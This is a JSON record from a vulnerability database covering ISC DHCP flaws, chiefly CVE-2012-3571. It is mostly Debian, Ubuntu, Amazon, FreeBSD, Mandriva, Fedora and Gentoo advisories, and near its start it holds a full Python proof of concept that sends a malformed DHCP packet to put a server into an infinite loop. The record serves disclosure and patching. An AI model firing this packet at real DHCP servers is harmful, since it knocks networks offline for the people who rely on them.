"AV:A/AC:L/Au:N/C:N/I:N/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:50", "description": "", "published": "2012-07-29T00:00:00", "type": "packetstorm", "title": "SC DHCP 4.1.2 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3571"], "modified": "2012-07-29T00:00:00", "id": "PACKETSTORM:115094", "href": "https://packetstormsecurity.com/files/115094/SC-DHCP-4.1.2-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/python \n''' \nSC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of \nservice(infinite loop and CPU consumption/chew) via zero'ed client name length \n \nhttp://www.k1p0d.com \n \n''' \n \nimport socket \nimport getopt \nfrom sys import argv \n \ndef main(): \nargs = argv[1:] \ntry: \nargs, useless = getopt.getopt(args, 'p:h:') \nargs = dict(args) \nargs['-p'] \nargs['-h'] \nexcept: \nusage(argv[0]) \nexit(-1) \n \ndhcp_req_packet = ('\\x01\\x01\\x06\\x00\\x40\\x00\\x03\\x6f' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x22\\x5f\\xae' \n'\\xa7\\xdf\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x63\\x82\\x53\\x63' \n'\\x35\\x01\\x03\\x32\\x04\\x0a\\x00\\x00' \n'\\x01\\x0c\\x00' \n'\\x37\\x0d\\x01\\x1c\\x02\\x03\\x0f' \n'\\x06\\x77\\x0c\\x2c\\x2f\\x1a\\x79\\x2a' \n'\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \n'\\x00\\x00\\x00\\x00') \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock.connect((args['-h'], int(args['-p']))) \nsock.sendall(dhcp_req_packet) \nprint 'Packet sent' \nsock.close() \n \ndef usage(pyname): \nprint ''' \nUsage: %s -h <host> -p <port> \n''' % pyname \n \nif __name__ == \"__main__\": \nmain() \n \n \n`\n", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/115094/dhcp412-dos.txt"}], "debian": [{"lastseen": "2020-11-11T13:13:06", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2516-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nJuly 26, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : isc-dhcp\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-3571 CVE-2012-3954\n\nTwo security vulnerabilities affecting ISC dhcpd, a server for automatic\nIP address assignment, in Debian have been discovered.\n\nCVE-2012-3571\n\n Markus Hietava of the Codenomicon CROSS project discovered that it is\n possible to force the server to enter an infinite loop via messages with\n malformed client identifiers.\n\nCVE-2012-3954\n\n Glen Eustace discovered that DHCP servers running in DHCPv6 mode\n and possibly DHCPv4 mode suffer of memory leaks while processing messages.\n An attacker can use this flaw to exhaust resources and perform denial\n of service attacks.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 4.1.1-P1-15+squeeze4.\n\nFor the testing (wheezy) and unstable (sid) distributions, this problem\nwill be fixed soon.\n\n\nWe recommend that you upgrade your isc-dhcp packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 3, "modified": "2012-07-26T11:41:11", "published": "2012-07-26T11:41:11", "id": "DEBIAN:DSA-2516-1:B85CA", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00156.html", "title": "[SECURITY] [DSA 2516-1] isc-dhcp security update", "type": "debian", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-11-11T13:18:32", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3571", "CVE-2011-4539"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2519-2 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nAugust 4, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : isc-dhcp\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4539 CVE-2012-3571 CVE-2012-3954\n\nIt was discovered that the recent update for isc-dhcp, did not contain\nthe patched code included in the source package. Due to quirk in the\nbuild system those patches were deapplied during the build process.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 4.1.1-P1-15+squeeze6.\n\nWe recommend that you upgrade your isc-dhcp packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2012-08-04T11:11:14", "published": "2012-08-04T11:11:14", "id": "DEBIAN:DSA-2519-2:7D25C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00161.html", "title": "[SECURITY] [DSA 2519-2] isc-dhcp regression", "type": "debian", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-11-11T13:12:30", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3571", "CVE-2011-4539"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2519-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nAugust 1, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : isc-dhcp\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4539 CVE-2012-3571 CVE-2012-3954\n\nSeveral security vulnerabilities affecting ISC dhcpd, a server for\nautomatic IP address assignment, have been discovered. Additionally, the\nlatest security update for isc-dhcp, DSA-2516-1, did not properly apply\nthe patches for CVE-2012-3571 and CVE-2012-3954. This has been addressed\nin this additional update.\n\nCVE-2011-4539\n\n BlueCat Networks discovered that it is possible to crash DHCP servers\n configured to evaluate requests with regular expressions via crafted\n DHCP request packets.\n\nCVE-2012-3571\n\n Markus Hietava of the Codenomicon CROSS project discovered that it is\n possible to force the server to enter an infinite loop via messages with\n malformed client identifiers.\n\nCVE-2012-3954\n\n Glen Eustace discovered that DHCP servers running in DHCPv6 mode\n and possibly DHCPv4 mode suffer of memory leaks while processing messages.\n An attacker can use this flaw to exhaust resources and perform denial\n of service attacks.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 4.1.1-P1-15+squeeze5.\n\nFor the testing (wheezy) and unstable (sid) distributions, this problem\nwill be fixed soon.\n\n\nWe recommend that you upgrade your isc-dhcp packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2012-08-01T18:34:43", "published": "2012-08-01T18:34:43", "id": "DEBIAN:DSA-2519-1:B7532", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00159.html", "title": "[SECURITY] [DSA 2519-1] isc-dhcp security update", "type": "debian", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:00", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "**Issue Overview:**\n\nA denial of service flaw was found in the way the dhcpd daemon handled zero-length client identifiers. A remote attacker could use this flaw to send a specially-crafted request to dhcpd, possibly causing it to enter an infinite loop and consume an excessive amount of CPU time. ([CVE-2012-3571 __](<https://access.redhat.com/security/cve/CVE-2012-3571>))\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote attacker could use these flaws to cause dhcpd to exhaust all available memory by sending a large number of DHCP requests. ([CVE-2012-3954 __](<https://access.redhat.com/security/cve/CVE-2012-3954>))\n\n \n**Affected Packages:** \n\n\ndhcp\n\n \n**Issue Correction:** \nRun _yum update dhcp_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n dhcp-4.1.1-31.P1.17.amzn1.i686 \n dhcp-devel-4.1.1-31.P1.17.amzn1.i686 \n dhcp-debuginfo-4.1.1-31.P1.17.amzn1.i686 \n dhclient-4.1.1-31.P1.17.amzn1.i686 \n dhcp-common-4.1.1-31.P1.17.amzn1.i686 \n \n src: \n dhcp-4.1.1-31.P1.17.amzn1.src \n \n x86_64: \n dhcp-common-4.1.1-31.P1.17.amzn1.x86_64 \n dhclient-4.1.1-31.P1.17.amzn1.x86_64 \n dhcp-devel-4.1.1-31.P1.17.amzn1.x86_64 \n dhcp-debuginfo-4.1.1-31.P1.17.amzn1.x86_64 \n dhcp-4.1.1-31.P1.17.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-08-03T15:56:00", "published": "2012-08-03T15:56:00", "id": "ALAS-2012-115", "href": "https://alas.aws.amazon.com/ALAS-2012-115.html", "title": "Medium: dhcp", "type": "amazon", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "Markus Hietava discovered that the DHCP server incorrectly handled certain \nmalformed client identifiers. A remote attacker could use this issue to \ncause DHCP to crash, resulting in a denial of service. (CVE-2012-3571)\n\nGlen Eustace discovered that the DHCP server incorrectly handled memory. A \nremote attacker could use this issue to cause DHCP to crash, resulting in a \ndenial of service. (CVE-2012-3954)", "edition": 5, "modified": "2012-07-26T00:00:00", "published": "2012-07-26T00:00:00", "id": "USN-1519-1", "href": "https://ubuntu.com/security/notices/USN-1519-1", "title": "DHCP vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:48", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3571", "CVE-2012-3570"], "description": "\nISC reports:\n\nAn unexpected client identifier parameter can cause the ISC DHCP\n\t daemon to segmentation fault when running in DHCPv6 mode,\n\t resulting in a denial of service to further client requests. In\n\t order to exploit this condition, an attacker must be able to send\n\t requests to the DHCP server.\nAn error in the handling of malformed client identifiers can cause\n\t a DHCP server running affected versions (see \"Impact\") to enter a\n\t state where further client requests are not processed and the\n\t server process loops endlessly, consuming all available CPU\n\t cycles.\n\t Under normal circumstances this condition should not be\n\t triggered, but a non-conforming or malicious client could\n\t deliberately trigger it in a vulnerable server. In order to\n\t exploit this condition an attacker must be able to send requests\n\t to the DHCP server.\nTwo memory leaks have been found and fixed in ISC DHCP. Both are\n\t reproducible when running in DHCPv6 mode (with the -6 command-line\n\t argument.) The first leak is confirmed to only affect servers\n\t operating in DHCPv6 mode, but based on initial code analysis the\n\t second may theoretically affect DHCPv4 servers (though this has\n\t not been demonstrated.)\n\n", "edition": 4, "modified": "2012-07-24T00:00:00", "published": "2012-07-24T00:00:00", "id": "C7FA3618-D5FF-11E1-90A2-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/c7fa3618-d5ff-11e1-90a2-000c299b62e1.html", "title": "isc-dhcp -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-3954", "CVE-2012-3571", "CVE-2012-3570"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2012:115\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : dhcp\r\n Date : July 26, 2012\r\n Affected: 2011.\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been discovered and corrected in ISC DHCP:\r\n \r\n An unexpected client identifier parameter can cause the ISC DHCP\r\n daemon to segmentation fault when running in DHCPv6 mode, resulting\r\n in a denial of service to further client requests. In order to exploit\r\n this condition, an attacker must be able to send requests to the DHCP\r\n server (CVE-2012-3570\r\n \r\n An error in the handling of malformed client identifiers can cause\r\n a DHCP server running affected versions (see Impact) to enter a\r\n state where further client requests are not processed and the server\r\n process loops endlessly, consuming all available CPU cycles. Under\r\n normal circumstances this condition should not be triggered, but a\r\n non-conforming or malicious client could deliberately trigger it in\r\n a vulnerable server. In order to exploit this condition an attacker\r\n must be able to send requests to the DHCP server (CVE-2012-3571\r\n \r\n Two memory leaks have been found and fixed in ISC DHCP. Both are\r\n reproducible when running in DHCPv6 mode (with the -6 command-line\r\n argument.) The first leak is confirmed to only affect servers\r\n operating in DHCPv6 mode, but based on initial code analysis the\r\n second may theoretically affect DHCPv4 servers (though this has not\r\n been demonstrated.) (CVE-2012-3954).\r\n \r\n The updated packages have been upgraded to the latest version\r\n (4.2.4-P1) which is not affected by these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3570\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3571\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3954\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2011:\r\n 5153e3eb1b4ceca9f800544d13ef6872 2011/i586/dhcp-client-4.2.4-0.P1.1.1-mdv2011.0.i586.rpm\r\n 8c6117c838ec86e12abe5ea1efa12f85 2011/i586/dhcp-common-4.2.4-0.P1.1.1-mdv2011.0.i586.rpm\r\n 03dd3ee3fe46a4bc255a20bc0a3f4edd 2011/i586/dhcp-devel-4.2.4-0.P1.1.1-mdv2011.0.i586.rpm\r\n e6fb5efee36e445626e3e52314cb24e1 2011/i586/dhcp-doc-4.2.4-0.P1.1.1-mdv2011.0.i586.rpm\r\n 4da38e33e8542ae24e59f475a216dc88 2011/i586/dhcp-relay-4.2.4-0.P1.1.1-mdv2011.0.i586.rpm\r\n af313c55824cd839740cd03556b43650 2011/i586/dhcp-server-4.2.4-0.P1.1.1-mdv2011.0.i586.rpm \r\n c6766b7bfe76fbbbfe19df2a08863c47 2011/SRPMS/dhcp-4.2.4-0.P1.1.1.src.rpm\r\n\r\n Mandriva Linux 2011/X86_64:\r\n d59247271566158ed3ce91748e8bd244 2011/x86_64/dhcp-client-4.2.4-0.P1.1.1-mdv2011.0.x86_64.rpm\r\n 66e0771c5304de4550560bd39aa40f77 2011/x86_64/dhcp-common-4.2.4-0.P1.1.1-mdv2011.0.x86_64.rpm\r\n 37d678da37bb3b21a14a1e68619342de 2011/x86_64/dhcp-devel-4.2.4-0.P1.1.1-mdv2011.0.x86_64.rpm\r\n 5311a79668ab721cd829061f48dbbf39 2011/x86_64/dhcp-doc-4.2.4-0.P1.1.1-mdv2011.0.x86_64.rpm\r\n 5c59c00623d6b3a3a2130a5a467a9d33 2011/x86_64/dhcp-relay-4.2.4-0.P1.1.1-mdv2011.0.x86_64.rpm\r\n cc93817435d581230d1e7fcee425abb3 2011/x86_64/dhcp-server-4.2.4-0.P1.1.1-mdv2011.0.x86_64.rpm \r\n c6766b7bfe76fbbbfe19df2a08863c47 2011/SRPMS/dhcp-4.2.4-0.P1.1.1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niD8DBQFQEUxWmqjQ0CJFipgRAnMbAKDbViRMHizm7ES7BCmCya4K53J1BQCeLl+G\r\nmS5VX3nUx8CROAYnnG6xQl8=\r\n=EANl\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-07-29T00:00:00", "published": "2012-07-29T00:00:00", "id": "SECURITYVULNS:DOC:28333", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28333", "title": "[ MDVSA-2012:115 ] dhcp", "type": "securityvulns", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:48", "bulletinFamily": "software", "cvelist": ["CVE-2012-3954", "CVE-2012-3955", "CVE-2012-3571", "CVE-2012-3570"], "description": "Multiple DoS conditions.", "edition": 1, "modified": "2012-09-18T00:00:00", "published": "2012-09-18T00:00:00", "id": "SECURITYVULNS:VULN:12491", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12491", "title": "ISC dhcp multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3570", "CVE-2012-3571", "CVE-2012-3954"], "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "modified": "2012-08-01T18:29:07", "published": "2012-08-01T18:29:07", "id": "FEDORA:501C221842", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: dhcp-4.2.4-9.P1.fc17", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3570", "CVE-2012-3571", "CVE-2012-3954", "CVE-2012-3955"], "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "modified": "2012-09-26T08:53:17", "published": "2012-09-26T08:53:17", "id": "FEDORA:D680C21BEE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: dhcp-4.2.4-13.P2.fc17", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3570", "CVE-2012-3571", "CVE-2012-3954", "CVE-2012-3955", "CVE-2012-5166"], "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "modified": "2012-10-19T23:59:48", "published": "2012-10-19T23:59:48", "id": "FEDORA:AF7A820B80", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: dhcp-4.2.4-16.P2.fc17", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4539", "CVE-2011-4868", "CVE-2012-3570", "CVE-2012-3571", "CVE-2012-3954"], "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "modified": "2012-08-06T07:51:10", "published": "2012-08-06T07:51:10", "id": "FEDORA:7BB5721376", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: dhcp-4.2.3-11.P2.fc16", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4539", "CVE-2011-4868", "CVE-2012-3570", "CVE-2012-3571", "CVE-2012-3954", "CVE-2012-3955"], "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "modified": "2012-10-03T03:21:03", "published": "2012-10-03T03:21:03", "id": "FEDORA:D3A7C213EB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: dhcp-4.2.4-1.P2.fc16", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4539", "CVE-2011-4868", "CVE-2012-3570", "CVE-2012-3571", "CVE-2012-3954", "CVE-2012-3955", "CVE-2012-5166"], "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "modified": "2012-10-23T01:52:50", "published": "2012-10-23T01:52:50", "id": "FEDORA:900B82094E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: dhcp-4.2.4-4.P2.fc16", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:55", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2748", "CVE-2012-3954", "CVE-2011-0997", "CVE-2011-2749", "CVE-2012-3955", "CVE-2012-3571", "CVE-2011-4539", "CVE-2012-3570", "CVE-2011-4868"], "description": "### Background\n\nISC DHCP is a Dynamic Host Configuration Protocol (DHCP) client/server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in ISC DHCP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nThe vulnerabilities might allow remote attackers to execute arbitrary code or cause a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll ISC DHCP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/dhcp-4.2.4_p2\"", "edition": 1, "modified": "2013-01-09T00:00:00", "published": "2013-01-09T00:00:00", "id": "GLSA-201301-06", "href": "https://security.gentoo.org/glsa/201301-06", "type": "gentoo", "title": "ISC DHCP: Denial of Service", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}
